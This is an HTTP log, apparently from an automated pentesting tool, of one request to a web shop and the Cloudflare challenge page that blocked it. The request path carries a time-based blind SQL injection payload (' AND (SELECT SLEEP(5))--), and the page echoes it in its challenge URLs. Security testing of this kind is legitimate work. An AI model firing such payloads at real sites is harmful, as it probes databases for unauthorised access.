REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/1%27%20AND%20%28SELECT%20SLEEP%285%29%29--/assets/section-image-banner.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9552
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8479bfa93a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=yZIWtM4NLoP2rgxQj4FIdBa1%2BffkAOpvA8kDtcM%2FZQ2H6jsw%2BLnzBq1rqqf3rXUJ0RNNcCm0K0nPMUbDyQEWTt5aqBZzoBHDAAdXsruw0mX5oDXBH3wnQ4MwmbAVDQgDUFnMbr1Qfm2oXL9Xxg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8479bfa93a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '8V2WlDFwmljhaXxxbZBXQKnMUuczNlBvBG3ogyYk_rk-1784281169-1.2.1.1-_ABlUt9_xfhO_I9.6g4Di8laM.OX_Frkoz.6oxz1HqJr2.BAilu.I74eee4AjdQQ',cITimeS: '1784281169',cRay: 'a1c8479bfa93a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/1'%20AND%20(SELECT%20SLEEP(5))--/assets/section-image-banner.css?__cf_chl_tk=aiigjbqGb053VWEkH3RCYmi4kiDFO8EzEt5wW0bHtGU-1784281169-1.0.1.1-YlC69qBcCwD_IPBiQRJ5BnMD2oNAPLfXDvzniRGM1qM",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/1'%20AND%20(SELECT%20SLEEP(5))--/assets/section-image-banner.css?__cf_chl_f_tk=aiigjbqGb053VWEkH3RCYmi4kiDFO8EzEt5wW0bHtGU-1784281169-1.0.1.1-YlC69qBcCwD_IPBiQRJ5BnMD2oNAPLfXDvzniRGM1qM",md: 'kOblx7GLbLB_IxRqIQi0Tti2LYEnXfzCuQFG7uoJTVA-1784281169-1.2.1.1-lR9UZdgasHyBUnpTBgcKoRhRqQ4yFul8Ae_sf5LhP9PhHWxWRfWErvU8exa.1IkbfMPY9mVHwVwwj4Q6md4_AcqGWoSU9SD_qxrnwXpJKeidaOh8Qi5wDveX6RpdXwrtkJIJflokBXHuxE_RW718ro.OTyN2jALFTuugCKTjA0OryGA3zHCniqQlyeXmICLaeEDvRn1DgtelbYGuMD3d08TF.24cFiGrC5a1cYHlhvPqI6ysZ8IaHmdLTsd1t2f5zShQ8o7e2e_x0YGC08xZsY8z1ZXnAjIf9QGd3gYZWxpMAReQr0h551AgdKpyTUWim8ubnKkpBN.ifwWHDJDDnjN5jDdW.4kWQ3k4upUKIaiFHR_jQtZ5D0ZSiMDVgyLWWv7vQadj5WMHxVZPaq7uzZf3UaejUDU6jHFCEbko.16fTiTyh.D7NXd3zPOrnXvTeMYSi59WE3UuIp4sh3xy0tINxgIXunOub4_bq9.3p7ahWQX.z16YUcXXlP.qWpVM0acKBgZJvc9qH.Lnc9z_u4f6bybTSocgNrozSK.lylv57141L21aAZMtSIjne7YSoHjprDvRLwzN0WpcGSpD7OPOgT8IEkws0ZYifDY4SRJrgn2Ukp8kNXS6U1PCcy6rkeG6NwTtVOemQcJUv7ffjpkyVNpXl4CPEivfi_epHHq5s8nmBY2z7T2wc6s6VP5iJOfDo7KptsUck4Vc.N1mQEHExnnWWFg9e5oJTbI8hTWEbQY1LUJYU.vcQdLunZZyus2UqRk9APiajYg._9PROcGmoj6tBgMDEyHj3Ff61Opv4lE2BrYWcSTSsSZLCnL8uLJFMMK9mC6xEMgWEfdq484fs.iW5cjxsbBQQWl8XkNpIWFsoeQ7cAqR2qOngcFk1krGxrBfUspY_PEM34zZuS3q4Mo1Amt9fjedWFLtt6NZCggOsxAFjNJLpHCAdG.ko9XWi24KPUZx8Cft3EPRocpkUUctJmkmbPuu2PIm1KTo2Srw_vzOZy4Q8VWfioHuCCTz9qM.xI57c3OawgMYaFISeVnGCnuVrtAWFaTK9xrYc8tI6IVu5T4RUIxsvhFKlC28.8IpiVzJ01gk76tAJH3wEsP5G9h2nLs0IKNzBDnnmig3TJYJDH9.dUaj_16FFIkyXdzKjAZawCx.7omkr3DbEUGAZuhx1B8PMxwII8wqN2nUoRGQrTF2vPEqXb3bixz1FGpJITR.uyxgqCY_G3DQ6KBvzxa9vrRN0iGId3A39GHbqbmeCLZGKZX75U_2',mdrd: 'DcQSjnkGY7SAOt1Gsi_q_eeHuAqklYyjmxQ8nR2HdaE-1784281169-1.2.1.1-J_6XV2F_RX82XiHq2X4WwWw.KZ.dNrQbATJrLnis3ESaZ_GfxxpcNPHARsidmF_wRI_eSHNHGfbwqqhAGmjwzIaUY4KrI9Zs_YrKDC4MNtvJ92F0dTC4ujn_dMABcA495DpuX6kfscCKlUwLXriuZDIntozKBQZc1a72vXybEIKF9I37suwvj6wBHU1KS_YEb1Lt9Dp_1kSFcqDezGC8AJWNeUlsJK6D1NwpeqZRyc72rST1G8FHqvgylMqS_XUU',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8479bfa93a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/1'%20AND%20(SELECT%20SLEEP(5))--/assets/section-image-banner.css?__cf_chl_rt_tk=aiigjbqGb053VWEkH3RCYmi4kiDFO8EzEt5wW0bHtGU-1784281169-1.0.1.1-YlC69qBcCwD_IPBiQRJ5BnMD2oNAPLfXDvzniRGM1qM"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
